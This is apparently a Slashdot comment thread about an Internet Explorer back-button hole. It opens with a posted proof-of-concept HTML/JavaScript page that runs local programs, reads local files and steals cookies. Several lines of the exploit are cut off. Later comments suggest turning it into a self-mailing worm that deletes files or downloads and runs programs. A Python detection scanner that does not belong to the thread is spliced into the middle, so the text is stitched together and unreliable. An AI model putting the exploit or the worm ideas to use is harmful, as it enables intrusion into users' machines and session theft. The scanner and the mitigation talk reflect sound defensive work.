sorry forgot the extrans correct page attached
<html>
<h1>Press link and then the backbutton to trigger script.</h1>
<a href="javascript:execFile('file:///c:/winnt/syste
Run Minesweeper (c:/winnt/system32/calc.exe Win2000 pro)</a><br>
<a href="javascript:execFile('file:///c:/winnt/syste
Run Minesweeper (c:/windows/system32/calc.exe XP, ME etc...)</a><br>
<a href="javascript:readFile('file:///c:/test.txt')"
Read c:\test.txt (needs to be created)</a><br>
<a href="javascript:readCookie('http://www.google.co
Read Google cookie</a>
<script>
// badUrl = "http://www.nonexistingdomain.se";
badUrl = "about:<html><body onload=javascript:history.back() ><form><input type=button onclick=javascript:history.back()> </form></body></html>";
function execFile(file){
alert (badUrl);
s = '<object classid=CLSID:11111111-1111-1111-1111-11111111111
s+= 'CODEBASE='+file+'></OBJECT>';
backBug(badUrl,s);
}
function readFile(file){
s = '<iframe name=i src='+file+' style=display:none onload=';
s+= 'alert(i.document.body.innerText)></iframe>';
backBug(badUrl,s);
}
function readCookie(url){
s = '<script>alert(document.cookie);close();<'+'/script>';
backBug(url,s);
}
function backBug(url,payload){
len = history.length;
page = document.location;
s = "javascript:if (history.length!="+len+") {";
s+= "open('javascript:document.write(\""+payload+"\")
s+= ";history.back();} else '<script>location=\""+url
s+= "\";document.title=\""+page+"\";<"+"/script> ';";
location = s;
}
</script>
</html>
I can confirm that this also works in IE 5.5 under Win2K with all updates/patches.
We're going to make information free Mr. Anderson, whether you like it, or not.
Why has a Mozilla security hole never been posted on Slashdot? I have the impression that Slashdot tries to make IE look bad. Am I right?
Is a fix for the back button exploit really as important as something like the following?
Q310510: Recommended Update. Download size: 220 KB, 1 minute. This update resolves the "Playback and Copy-Protection Issues When You Try to Play the Snow White and the Seven Dwarfs DVD Movie" issue in Windows XP and is discussed in Microsoft Knowledge Base (KB) Article Q310510. Download now to be able to play Disney's "Snow White and the Seven Dwarfs" Platinum Collection DVD.
For more information about this issue, read Microsoft KB Article Q310510. (This site may be in English.)
I do understand the case to the full extent and yet I cannot find the part that warrants a Slashdot main page report.
What if parent said "since when was using anything in Mozilla safe?" Will it still be funny? NO! -1 Flamebait?
Do you think when they fix the bug that launches minesweeper they will also fix the one that launches Solitaire?
Say someone were to take the code a gentleman posted below, with an autoback initiated in script, and then picked an open relay and fired it at a few million email addresses? Say for instance that it also sent copies of itself to others in the process? Say for instance it also calls cmd.exe to delete anything it can in the system directories.
;)
Ahhhh amusing it would be
Got Code?
This here is my sig. Is it not nifty? Worship the sig. (Sorry Pete)
Is good, I like.
Rhapsody in Numbers
Maybe I patched it somewhere with one of the numerous bugfixes out there, but when I try this exploit, it pops up an ActiveX security warning and refuses to execute the exploit.
Of course, this may be due to a 3rd party security patch that I saw on a website as opposed to an official MS one?
"Nothing strengthens authority so much as silence." - Charles de Gaulle
I have not seen a popup ad in years. I was not vulnerable to the .eml bugs. I laugh at websites that are blank for people like me who have JavaScript turned off. I have always thought that JavaScript, captive X etc. were the scourge of the internet.
Ever since we have had the option I have used the built in security functions of IE. Tools/Internet Options/Security
Turn off everything for your Internet zone. Add all the sites that you visit regularly to "Trusted Sites" and enable all the bells and whistles you want.
If a site breaks because they have not done simple checks to see if you have java script enabled then screw them and move on to a site that is run by someone who has an element of style and thoroughness.
Here is a wish list I do have for IE though. One power tool I have allows you to toggle images on and off with a click. I would like such a power tool that would enable/disable JavaScript with a click, and another to add trusted zones on the fly. If anyone out there has the coding capability, I think you may have something.
It seems you only read the first sentence...
10 PRINT CHR$(205.5+RND(1)); : GOTO 10
Netscape 4.79 (WinNT) gives a javascript error and tries to rerun the script. Unless you're a ninja with alt+f4 and the mouse, you're gonna have to shut down your browser. Also, the sploit works fine with IE 5.5 under NT.
try the recent moz nightly builds, they are really impressive (finally)
Buffer overflows... these are implementation-specific bugs and should be easily patchable. However, MS put a lot of functionality into IE (for the most part because it's bundled), and when you look at the separate parts of all this functionality, you don't see exploitable stuff. However, combining parts of the functionality CAN LEAD to a situation that wasn't foreseen, and perhaps will lead to a vulnerability.
It's easy to say "Crap!" but it takes a wicked mind to combine the right parts of the functionality of a program to create a hole, a mindset which is obviously not present under the IE designers. (but which should be though).
As a true microsoftie I more and more begin to realize that the bundling should be undone, so the set of functionality built into the web browser is simply focussed on what it should do: rendering pages.
Using another browser is not the answer however. The only browser that comes close to IE6 is Netscape/Mozilla, however these browsers are also packed with features you'll probably never need but CAN probably be used to create a hole when combined with other functionality in the program.
Never underestimate the relief of true separation of Religion and State.
1. install Windows (ouch)
2. run IEradicator (wonderful little IE remover available here), and make sure Outlook is gone too
3. install ZoneAlarm, and make sure not to give net access to any MS apps
4. run Opera and Eudora
5. enjoy! If evil bureaucrats force use of Exploder/Outlook, install them (after the forcible extraction in step 2) and use only when necessary, giving them one-time access privileges only.
Access denied error message. NT 4.0 with service pack 6, IE 5.00.2014.0216.
Another anti-MS article brought to you by /.! Here ya go guys, have a field day!
Hotmail has had a history of session stealing by making informed guesses as to what the cookies are. With the "take my cookies on back button" bug, stealing sessions just got A LOT easier. The scary thing is this should affect existing sessions to more serious sites such as online trading.
I have not tested other AV products yet, but the code from the securityfocus.com page is detected as 'Exploit-CodeBase' by McAfee VirusScan 4.5.1, engine 4.1.60, DAT 4.0.4196 [10-Apr-2002], and probably earlier versions.
Your current security settings prohibit running ActiveX controls on this page. As a result, the page may not display correctly.
This is IE5, version 5.00.3103.100
Win2K pro, SP2
A few months ago I did every security update I could find on the Windows Update site (took six freaking reboots). Not sure if that helped.
In Tools -> Internet Options -> Security, I'm just set to 'medium'...
...maybe it should have worked, but it's buggy?
Duncan
I've been waiting for commercial browsers to subtly manipulate information for quite a while. Maybe sites served from Apache will somewhen load 0.2s slower than the ones served from IIS. Only on Explorer, of course.
To be perfectly honest, I don't run applications that annoy me unless I absolutely have to.
Opera annoys me because it insists on trying to "be" the desktop, and opens all my browser windows inside it. That reduces the size of my browser windows, and it means I can't see the stuff behind as easily. If all it's going to do is draw background colour, then why draw it at all ?
I know some people like the way it does that, but I don't, and I'd hazard a guess that at least one other person agrees with me.
I normally have several browser windows open at once, and I'll switch to one that's loaded while waiting for another to load. I'll read things on the screen from other applications at the same time.. having opera try and grab all the desktop space is just too damn annoying to make me want to use it.
Half the replies are hacks to fix IE! /. readers aren't smart enough to catch on that the only fix for Exploder is to stop using it, how do we expect the hordes of clueless M$ lemmings to ever figure it out?
If
This will work on win98 boxes too - just drop the system32 and voila, minesweeper!! (or just about any other prog. that you'd like to run :)
:p
got root?
Thor Larholm released another IE universal cross-site-scripting bug today. And there are more where that came from...
Press link and then the backbutton to trigger script.
Run Minesweeper (c:/winnt/system32/calc.exe Win2000 pro)
See, that's the reason I install everything under D:/WINNT. I knew this whole partition thing was invented for a reason: Increased Security!
Hans
Push 'em forward to one page, then javascript:history.back() from it - kids, don't do this at home!
Bad one, this. At least most of the IE loopholes I can avoid through settings tweaking / not surfing sites who would pull this on me. Now that *any* site can get full read/write/execute access on me with nowt but a redirect and history.back(), it's time to use Mozilla for my pr0n!
Seek and you shall find. Like all good programs, Opera gives you the opportunity to turn off this function with File -> Preferences -> Windows -> Uncheck "Open windows inside Opera workspace" and then elect to restart the browser.
IE is like that too.
In other words, most programmers are lame in their heads. But at least they get the job done. Maybe it's impossible to be anal AND productive?
Kaspersky anti virus pops up immediately and stops further execution of the javascript. you then can delete it and none of the links on the page work, so no minesweeper or google cookies for me ...
IAAL
oh yeah, M$ decided that they didn't want you to disable JavaScript....
This
Is it just me, or is it impossible to pass arguments to the program you execute?
Starting cmd.exe is a lot more fun if you can tell it to do stuff, not just open up a window..
Indeed, isn't it the default that Opera opens each new page in a separate window (rather than as an MDI)? i.e. the poster must have actually gone and changed it at some point.
Personally I LOVE the way Opera does that (or alternately using XP and task button combining): Maybe I'm alone in this, but there was a certain weird tension stress I'd get when my taskbar was full of 40 different windows, yet I do often treat "browsing" as one task, so merging them together works remarkably for me.
See, flash is good for something ;)
You mean Opera, the spyware with built-in browser?
http://spychecker.com
nice, i hope you value your privacy as much as you value your surfing
Just in time, M$ has released a Mac UberPatch for your IE and Office. You too can have the treasured experience of "the cure is worse than the disease"!
Mod Karma -1: I sed bad wurds. If I cep my mouf shut, I wud be at riyses.
It works in IE, but not NS 4.7 or NS 6.2.... Thank god I don't use IE...
I want my rights back. I was actually using them when our government stole them after 9/11.
I've said this before, but a quick glance through the first few comments at threshold 2 didn't reveal anyone else having said it yet, so....
TURN OFF JAVASCRIPT, YOU IDIOTS!
Javascript is the Incarnation of Evil on this plane. It is the Scion of Satan. It is the Bastard of Beelzebub. Javascript blew up the Twin Towers on September 11. Javascript is what killed your goldfish when you were a kid.
(We now return you to your regularly scheduled "my browser is better than your browser" war.)
ya know, i tried to test this out. And apparently McAfee is way ahead of slashdot. It is already in their most recent virus definitions and warned me about the page (also prevented the loading of any content on the page).
:)
Glad to see that McAfee is still a quality product
This one really sucks given the plague of pop-ups out there on the web. However I couldn't get the code to work until I turned ON ActiveX... turning that off just might be the workaround until M$ decides to get around to addressing this one.
I tried the various POC HTML pieces in this thread and they all trigger my antivirus (F-secure) which sends me off to get Microsoft Security Bulletin MS01-20
This bulletin does not seem to me to have any relevance to the scripting problem we're talking about. However, the exploit does not work on my version of IE6, even if I tell F-secure to ignore the alert.
"Don't belong. Never join. Think for yourself. Peace." V.Stone, Microsoft Corporation
I'm sure that this does effect people who have no AV protection on their pc's, however, when I tried to create this code to give it a test run, my AV software told me "The file C:\Documents and Settings\NICKM\Desktop\New Text Document.txt is infected with Exploit-CodeBase Trojan." and would not allow it to run. (sorry, my work machine is XP)
I dont see this as too much of a problem
What security?
I have javascript, activex, and everything else disabled on IE 5.01.
When I visit Microsoft's web site, I get all kinds of javascript runtime errors.
WHY would errors occur if javascript isn't even running????
The best guess I could make is that js is disabled except when visiting Microsoft's web site.
If this is true, possibly a great hack would be to make IE (Ayeee!) think that it's on MS's site, and thus has full security, when the browser is actually pointing to a non-MS site.
Mozilla is also quite fast, but I like Opera much better. You don't believe me? www.opera.com :)
Dear Bill, do you have a
That's all.. and don't tell me that I have to use cookies, etc. to save the current position of a Flash movie. It's annoying. :)))
so back button is evil! Looks like M$ knows that. Learn from the boss
The device you are attempting to access is either read only or just another user.
Hmm.. hit the links.. then hit back.. no programs pop up?
Who makes you Sig?
It didn't work on this NT4.0 box when I ran IE5.5. It just had a javascript:.................. url.
Which should prove that Microsoft do work on security, even if they're not making it better :)
Not Buzzword 2.0 compliant. Please speak english.
Our IT department has mandated the use of IE for all web browsing, but at least our antivirus immediately recognizes "code-exploit" when I try to run the proof-of-concept. If I exclude the proof-of-concept file, the exploit works.
How long does MS intend to ignore this? Not every antivirus program will catch this, and what about those forced to use IE for unix?
I reckon it's time to go check out F-prot for unix (I've heard they have at least a Linux port).
Ignoring hunting season, isn't carrier pigeon still the safest way to get the web for Windows? That's how I get my packets to my computer daily when I browse.
~~ Behold the flying cow with a rail gun! ~~
I just tried the exploit on IE 5.5 (running on Windows 2000). The exploits works!
Nothing like a little backward compatibility.
You can almost hear Mickey right now: "Fix it, B****!!"
I grabbed the code and threw it on my Apache server within the office environment. I went to another machine to look at the code in IE. I tried it and got an error message (it was really long) that ended with "permission denied". It was a 98SE box. Anyone else got this?
-Jeff
If you clicked the link to read the article, you can't hit the 'back' button to return to slashdot...
..I even USED the back button in my browser. Alt or control-left works for me! Down with mice!
;) )
(yeah, I know, same triggers.
stupid ass POS microsoft... i'm #@$*#% sick of these POS microsoft security "holes"....
add up those security holes and you have one big space
Q: Somebody cracked into my default installation of Red Hat 6.2. What do I do?
A: Install Debian.
If you can execute minesweeper, you can use ftp (the commandline client) to download something from the web without the user noticing it, you can execute it, you can use del, you may even be able to format the fucking harddrive.
Need you know more?
If you copy the html off of this site and save it while you are running an updated virus scanner like, say, McAfee, it will tag it as a virus and contact your admin... Not good. :-)
L053R
I quite like the proximatron -- it's shonen-ware (basically free as in beer), and quite flexible...
:wq
Netscape has had and still has tons of security and crash bugs. Do you even read SecurityFocus? Or any other security site? It's head-in-the-sand people like you that have retarded the actual improvement of Linux software by believing they are perfectly safe and therefore nothing else needs to be done. The truth is completely the opposite! One day you'll wake up. Till then I feel sorry for whoever you work for.
Did you actually look at the code? Or visit the page set up by a slashdotter to test it:
http://www.eg.bucknell.edu/~ekrout/IE_Hack.html
When you hit the back button, the script is able to successfully launch an executable on my system. That means it can do almost fucking anything it wants to.
I would call that an exploit.
Another way is to never put your OS on the C:\ partition. For all of my Win2k boxes in our office, I always create several partitions on the 40GB drives that come w/our systems.
The C:\ is usually an image that I create to restore the system in case of a meltdown :)
The OS on every workstation in our office is on the D:\ partition.
It's not a cure or anything for this stupid bug....but it does help....considering that most of these script kiddies are writing this crap to initiate files from the C:\ partition...
"Look where we worship" -- Jim Morrison
When lynx calls external programs for protocols (e.g. telnet), the location is passed unchecked
- CERT Advisories: Lynx security issue! (Google cache)
- Vulnerability in Lynx Downloading, Vulnerability in Lynx Temporary Files
- ...
Just search for lynx advisories/security on Google.
dlf has spoken
Chuck was talking about data: URLs, not this IE hole.
That's surprising. Perhaps someone should document this phenomenon of not being able to throw huge amounts of people at a complex software project late in its development with any expectation of fixing it quickly. :P
Ya know, I think that they would have been better off if they had spent the last two months assigning everyone a book report on The Mythical Man-Month and then realizing that this change will have to be a permanent course correction instead of a short-term fix.
Best. Comment. Ever. Enjoy!
with that asinine Konqueror troll.
"If IE's Windows integration is a monopoly, then I'm all for the removal of Konqueror from KDE."
Let me assure you that the irony of you posting this drivel in a discussion thread about the latest exploit for IE has escaped no one. You are making quite the fool of yourself.
Do not spread "09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0" over the internet, thank you.
alas, there is a real exploit.
i just tried it (2Kpro/ie5.5) and:
1) clicked on the link
2) got "can't find server"
3) clicked back button
4) got some weird gibberish in the window and
5) PRESTO! got minesweeper.
there was *no* user interaction except clicking the link and then the back button. there were *no* warnings, much less dialogs with "cancel" options.
this sucks, especially since "back" would be my default response in such a situation, to check what the link was that resulted in server not found (i often do that to check if there was bad javascript or something in the link).
This Like That - fun with words!
Sigh. The response to stories like this is why I've stopped reading Slashdot for the most part. I used to read it every day, and now I go for months at a time without even looking at the front page.
Yes, there is a security problem in IE. Yes, there have been many such problems in the past. There have also been security problems with browsers for Linux. The discussion goes like this:
Linux Newbie: Microsoft should be put out of business! They don't care about security! There are hundreds of security holes in Windows and Internet Explorer!
Level-headed Computer User: But there have been security holes in Linux and software for Linux.
Linux Newbie: But Linux is a more secure operating system! You can't do as much damage under Linux because of file permissions and other security measures.
Level-headed Computer User: But we're talking about exploits. By definition an exploit is something that you were never supposed to be able to do in the first place.
Linux Newbie: Down with Microsoft! Bill Gates sucks!
I have Opera set to NOT accept pop-up windows. Blocks X10 ads (et.al.), and annoying things just like you have described. I can turn it back on anytime if I know I need a pop-up window in a trusted site.
Yet another collection of sixty-five identical comments: "A security hole in a Microsoft product? I'm shocked!"
Gee, how original. You guys must be a bunch of comic geniuses to come up with something that witty and unpredictable.
You karma whores. You've come upon a foolproof way to get scores of "5, Funny". Just write "Yeah right, as if Microsoft doesn't suck" and you'll get modded up every time. This method is so foolproof, I bet I'll get modded down just for revealing your secret.
What Would Jesus Do
(for a Klondike bar)?
I just copied the source onto my machine and tried to access it. McAfee pops up saying something along the lines of "The file that is trying to execute has a variant of the Exploit.something trojan".
It then gives the option to terminate it or continue. I told it to continue since I wanted to see if patched IE 5.5 is vulnerable.
I cannot get the window to pop up again, but the scanner console says there was an infected file scanned, and every time I try to copy, rename, move, or create a file with the same contents, the file gets a .vir extension added to it. Changing the name of that file doesn't remove the .vir extension.
Where is your basis for this? Stating that "nobody" codes to anything greater than Java 1.1.x is so completely untrue that it is frightening someone would say it.
Java developers code to the current release which is 1.4.0. Perhaps code monkeys working in J++ only code to 1.1.x but MOST java developers code in 1.4.0 or at worst 1.3.x.
Only when you do not know your code base, and you know that people will be out there using IE do you consider "coding down" to 1.1.x. Otherwise you write to the current version and then use a script or some kind of notice to the user that they need to upgrade.
Applets will not disappear in 5 years. .NET will replace very little due to its soon to be found security bugs (prediction).
Post fact otherwise get labeled as a troll.
In related news, Cern is reporting that "File, Open" is generally considered a huge security risk in all versions of IE.
Love many, trust a few, do harm to none.
The links assume the existence of "c:\text.txt" and "c:\winnt\winmine.exe." Change these paths to valid text files and executables on your computer. Then tell us what happens.
I tried it...
it does work when the page is on my hard drive,
but it doesn't work when I upload the page to the internet...
In other words, what the parent posted runs in the correct security zone, no problem there
http://vil.nai.com/vil/content/v_99383.htm
Virus Characteristics
This is a generic detection of malware which tries to exploit a Microsoft Internet Explorer vulnerability, which was discovered February 25, 2002. This exploit could result in an executable file being run without the user's permission or knowledge, when visiting a web page or viewing an HTML email message. This affects Internet Explorer 4.x and higher, Microsoft Outlook, and Microsoft Outlook Express.
This vulnerability has incorrectly been called the "Popup Object Vulnerability", the "Data Source Object Vulnerability", the "XMLid Exploit", or the "DynHTML Exploit", but these are just the methods to insert the exploit into the HTML. The vulnerability occurs because Internet Explorer allows HTML in the "Internet Zone" to launch programs in the "My Computer Zone".
A patch is available from Microsoft
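As an added defensive example (not code from this thread, from NAI, or from any AV product), here is a small scanner in the spirit of the generic Exploit-CodeBase detection described above: it flags the combination of ingredients the posted proof-of-concept relies on (a javascript: URL branching on history.length, a history.back() bounce, document.write into an opened window, and a payload that reaches the local zone or the cookie), while leaving an ordinary "Go back" link alone. The indicator patterns, verdict thresholds and sample pages are all constructed here.

```python
"""Added example: flag the back-button zone-confusion pattern in an HTML page.
Not code from the thread, NAI or McAfee; patterns and samples are constructed."""
import re
from html import unescape

# Each pattern on its own is harmless (history.back() is in every "Go back"
# link); the verdict in classify() only fires on the combination.
INDICATORS = {
    # a javascript: URL whose first statement branches on history.length
    "history_length_branch": re.compile(
        r"javascript:\s*if\s*\(\s*history\.length\s*[!=]=", re.I),
    # the bounce back into the previously viewed page
    "history_back": re.compile(r"history\.back\s*\(\s*\)", re.I),
    # bounce fired from onload, so no click is needed (the about: variant)
    "auto_back": re.compile(
        r"onload\s*=\s*[\"']?\s*(?:javascript:)?\s*history\.back", re.I),
    # payload is written into a window opened on the bounced-to URL
    "open_document_write": re.compile(
        r"open\s*\(\s*[\"']javascript:document\.write", re.I),
    # ways the payload reaches the local zone or the session cookie
    "object_codebase": re.compile(r"<object[^>]*\bcodebase\s*=", re.I),
    "iframe_src": re.compile(r"<iframe[^>]*\bsrc\s*=", re.I),
    "local_file_url": re.compile(r"file:///?[a-z]:[/\\]", re.I),
    "cookie_read": re.compile(r"document\.cookie", re.I),
}


def scan_html(html: str) -> set:
    """Return the names of all indicators present in the entity-decoded page."""
    text = unescape(html)
    return {name for name, rx in INDICATORS.items() if rx.search(text)}


def classify(html: str) -> str:
    """'back-button-exploit', 'suspicious' or 'clean' for one HTML document."""
    hits = scan_html(html)
    bounce = {"history_length_branch", "history_back"} <= hits
    inject = "open_document_write" in hits
    local_reach = "local_file_url" in hits and bool(
        hits & {"object_codebase", "iframe_src"})
    payload = local_reach or "cookie_read" in hits
    if bounce and inject and payload:
        return "back-button-exploit"
    if bounce and (inject or payload):
        return "suspicious"
    return "clean"


def needs_user_click(html: str) -> bool:
    """True unless the page triggers the bounce itself from body onload."""
    return "auto_back" not in scan_html(html)


# Constructed samples. A plain "Go back" link must stay clean.
BENIGN_PAGE = '<p><a href="javascript:history.back()">Go back</a></p>'

# Skeleton with the structure of the posted proof-of-concept; the CLSID and
# the path are placeholders, so this page does nothing even in a vulnerable IE.
POC_LIKE_PAGE = r"""<html>
<a href="javascript:go('file:///c:/PLACEHOLDER/program.exe')">link</a>
<script>
function go(file){
  payload = '<object classid=CLSID:00000000-0000-0000-0000-000000000000 CODEBASE='+file+'></OBJECT>';
  len = history.length;
  s = "javascript:if (history.length!="+len+") {";
  s += "open('javascript:document.write(\""+payload+"\")";
  s += ";history.back();} else 'location=\"about:blank\"';";
  location = s;
}
</script></html>"""

# The about: page from the "no user interaction" variant, on its own.
AUTO_BOUNCE_PAGE = "<html><body onload=javascript:history.back()></body></html>"

if __name__ == "__main__":
    for name, page in [("benign", BENIGN_PAGE), ("poc-like", POC_LIKE_PAGE),
                       ("auto-bounce", AUTO_BOUNCE_PAGE)]:
        print(f"{name:12s} {classify(page):20s} click needed: "
              f"{needs_user_click(page)}  {sorted(scan_html(page))}")
```

The about: page alone is classed clean because it only supplies the bounce; it is the combination with the first page that a scanner should key on.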
AC 0wnz j00 biznatches!
that I use Netscape!
A slip of the foot you may soon recover, but a slip of the tongue you may never get over. -Benjamin Franklin
I don't post here much and I'm at college right now, so I can't test it on slashdot, but from posting on other sites Opera always has everything exactly the same when I hit back. I believe this is part of the design; it brings up exactly what was loaded before rather than re-loading the page like other browsers.
Personally I prefer E:\WINNT where D: is the CD-ROM. ;)
It also messes with some stuff you don't really want running.
One more degree of separation
/Users/chris/Library/Mozilla/Profiles/default/gt on n5yl.slt
I was sure that was a bug the first time I saw it.
chris@xanadu:~$ whatis /.
/.: nothing appropriate.
Microsoft Windows XS ;)
( for Xtra Secure
typical microsoft, not checking the security of simple things that are so often used, they miss huge problems like this :(
Pi
I am just updating my system to OS X 10.1.4, which told me this about the update to IE:
"This latest version - version 5.1.4 - resolves all potential security vulnerabilities in previous versions of Internet Explorer 5. This includes vulnerabilities that might have caused Internet Explorer to stop responding or caused a memory problem that compromised the security of the computer."
It's a pretty bold statement.
All my worries about IE are gone!
After going to the trouble of loading IE and trying out the linked hack html file, I was devastated to find that my copy of WinXP did not seem to have this feature built in.
Then I realized that I had proxomitron running. After bypassing it, the feature works perfectly.
Now who said having a ad filtering program running was a good thing?!?!?
I recognize the problem - will it be a +1 (Clueless/Funny) or -1 (Clueless/Wasted My Time)?
Guess I'll go with (Funny +1).
Google cookie works on Win 98 and IE 5.5 (5.50.4522.1800) but not Winmine.exe.